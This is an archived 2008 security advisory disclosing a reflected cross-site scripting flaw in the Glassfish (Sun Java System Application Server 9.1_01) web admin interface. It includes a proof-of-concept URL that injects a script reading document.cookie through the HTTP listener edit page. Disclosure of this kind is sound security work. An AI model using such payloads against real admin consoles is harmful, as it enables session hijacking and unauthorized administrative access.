XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

2008-06-10 / 2008-06-11

Credit: Eduardo Jorge

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

==============================

XSS - Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.

This is a vulnerable URL:

http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config

<pre>-- |_|0|_| Serrano Neves - a.k.a eth0|_|_|0| http://webappsecurity.wordpress.com|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds</pre>

References:

http://seclists.org/bugtraq/2008/Jun/0087.html

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.